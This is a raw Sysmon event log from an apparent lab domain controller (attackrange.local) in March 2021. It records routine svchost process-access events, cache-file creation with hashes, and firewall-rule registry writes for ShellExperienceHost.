12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.336{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.336{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.305{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=053B5126E4936135A10775DA26758C75,SHA256=A9B4943208F2BF5CF44DD3FA79428368D4836399A0B9AB9A0167366D9C57D43C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txtMD5=91784C62BBC0181E5D1A1939D62C7576,SHA256=7C5953F43236E76AD1EABF5FB4E75FDC98F73A7686BFF5C023843D16A53C2CA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txtMD5=E15FA9A83F9216A78A5E4AE2C2C08305,SHA256=65E0957B6D224D885497EE696AA97F94FE98D8BFBBD4F927508ABD645A4182BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txtMD5=83CDB65FC5E3B9880848CA153945CD99,SHA256=E2E2AC74937053440DD9592C7CC1619F3290A042838C9922D69E1B5BFF985B89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.274{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txtMD5=94E8C0A2D77D4C6A4CC2AA5D6D71B3FC,SHA256=F0E0AA4CBFFAC78A340ADD726D7D94A090CE6D8E6DEFBC9673531B4E5053B05D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.258{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txtMD5=3F65ED27EE681BC5D4F69A5C271DB6A1,SHA256=63828079B72050681B6811C4AA76A79CF8FB5F51E04B1596DBD761007BFC829E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.258{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txtMD5=006B1BF929F2A82B7AD00727A9F1623C,SHA256=A9F72540A0C0F03453F87AC641EB31BF401D6BE7A92F4615E9C49C7725BC3427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.133{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txtMD5=203D482240E2A13DE24F8F82A9037348,SHA256=5B64FA6B42BE7F59D4D48C4C85ED73B9311003133E8F02F04AE6FA198CD81ED2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.118{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\appcache[1].manMD5=5F027173844AA0ED63AE4AC12D3B615C,SHA256=72ADFCEA238F8F0B956A60BED2C609F825973CA4D52B5D92E3D41C51E15B40DF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-4|C=S-1-15-3-15993189-1149757597-3280441496-4094800555|C=S-1-15-3-139472938-1339732804-1469114779-4031155563|C=S-1-15-3-1849407097-1086866290-155560606-3624675039|C=S-1-15-3-2015030808-1290041139-4103196845-2461361948|C=S-1-15-3-2973957182-1175190094-721927306-1883016034|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|M=microsoft.windows.shellexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|D=C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy| 
13241300x80000000000000005055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F6A61CBC-5D69-4F0A-96E8-0897A7A528FB}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F8E0A5CC-A1F1-4C96-9ADD-2FF08FC38EAD}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x80000000000000005053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.102{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{67BAD8B2-7DCB-4714-A1B1-AE61F6D60200}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x80000000000000005052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.087{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E0CD201B-C978-4C73-A8BE-BB705A6A4385}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 
11241100x80000000000000005051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.087{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.087 23542300x80000000000000005050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.071{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.binMD5=2477E1067EE108D32AA262307A357732,SHA256=C1A0FD9DA6CCA70C5D69C4E62FBDC08EBABCEAB018611E869B6F78EBABE9E640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.071{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.binMD5=1454E96AC56B9536AB32CCA75F5E5D45,SHA256=9568E2708BEE9FE90D3D981F9D52415DED574A95BF9525EEE961A2467C9F5325,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.009{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
